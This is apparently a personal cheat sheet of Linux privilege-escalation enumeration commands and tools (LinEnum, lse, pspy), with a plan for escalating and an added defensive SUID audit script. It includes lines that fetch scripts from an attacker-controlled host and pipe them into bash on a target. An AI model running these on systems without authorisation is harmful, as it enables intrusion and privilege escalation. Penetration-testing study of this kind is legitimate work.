2 Enums
Start
sudo -l
crontab -l
ps auxww
uname -a
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null ..parens and semicolon must be escaped from the shell
pspy ..snoop processes
find / -type f -user www-data 2>/dev/null ..files
find / -type d -user www-data 2>/dev/null ..dirs
LinEnum
Extracts a large amount of information about the target
Can find ports listening only on localhost, which may point to port-knocking or pivot opportunities
Used by IPPSec
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
cp /opt/LinEnum/LinEnum.sh .
python -m SimpleHTTPServer 80
cd /dev/shm/ ..ramdisk (data won't actually be saved to disk)
cd /tmp ..optional (the way I've been doing it)
curl $MyIP:8000/LinEnum.sh | bash -s -- -t ..easy execute and thorough (-t is LinEnum's flag, so it goes after bash -s --, not to curl; port must match the SimpleHTTPServer you started)
curl $MyIP:8000/LinEnum.sh -o LinEnum.sh ..Download
LinEnum.sh -h ..help
LinEnum.sh -k password -e export -t ..keyword, export, thorough
wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh;chmod 700 lse.sh
lse.sh -h ..help
lse.sh -l 1 -i ..level 1; -i = non-interactive, don't prompt for the password
lse.sh -l 2 -i ..level 2; print everything
PsPy32
Snoop on processes/crons without needing root permissions.
Even finds root-crontabs
Copy it to the system with:
chmod +x pspy32
python -m SimpleHTTPServer 80
wget http://10.10.14.34/pspy32
./pspy32
./pspy32 --help
Timers
Kinda like crons
REF: procmon
systemctl list-timers
watch -n 1 'systemctl list-timers'
Tools
Get the tools.zip from the Udemy class and save it as a toolset
REFS
Bonus Enums:
SUID/SGID
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
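Added example, not part of the original notes: a small POSIX sh audit that runs the same SUID/SGID find as above and reports only the entries missing from a known-good baseline, which is how you turn this one-off enum into a repeatable check. The baseline list is a constructed placeholder, not a complete distro list.

```shell
#!/bin/sh
# Audit SUID/SGID files against a baseline snapshot.
# BASELINE below is a constructed placeholder; on a real host, generate it
# once from a known-good system with find_setuid_files and keep it in version control.
BASELINE='/usr/bin/sudo
/usr/bin/passwd
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chsh'

# Same predicate as the cheat-sheet find command, but printing bare paths
# (no ls -l) so the output is stable and diffable.
find_setuid_files() {
    find / -type f \( -perm -u+s -o -perm -g+s \) -print 2>/dev/null | sort
}

# Read paths on stdin; print only those not present in $BASELINE.
# grep -x matches whole lines, -F treats the path as a literal string.
flag_unexpected() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        if ! printf '%s\n' "$BASELINE" | grep -qxF -- "$path"; then
            printf '%s\n' "$path"
        fi
    done
}

# Number of unexpected entries in a newline-separated path list given as $1.
count_unexpected() {
    printf '%s\n' "$1" | flag_unexpected | wc -l | tr -d ' '
}

# Stand-alone run: ./suid_audit.sh --run
main() {
    unexpected=$(find_setuid_files | flag_unexpected)
    if [ -n "$unexpected" ]; then
        echo "SUID/SGID files outside baseline:"
        printf '%s\n' "$unexpected"
        return 1
    fi
    echo "No SUID/SGID files outside baseline."
}

case "${1:-}" in --run) main ;; esac
```

A non-zero exit from main makes it easy to wire into a cron job or CI check that alerts when a new setuid binary appears.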
Writeable
cd /var/www/html/webservices/monstra/
find . -writable -ls
Enumeration Plan
Check your id, whoami
Linux Smart Enumeration (lse) with increasing levels
lse
lse -l 1
lse -l 2
LinEnum and other scripts
If they fail, run the checks manually
Or check other cheatsheets
https://blog.g0tmi1k.com/..linux-privilege-escalation
Check common files
/var/backup
/var/logs
/tmp
/home/user/.*history
Try easy ones first:
sudo, cron, suid
root processes, enumerate version, check exploits
internal ports you can forward to your-remote-machine
Harder:
Re-read your enums, look for oddities
Unusual file-systems (not ext,swap,tmpfs)
Strange usernames
Kernel exploits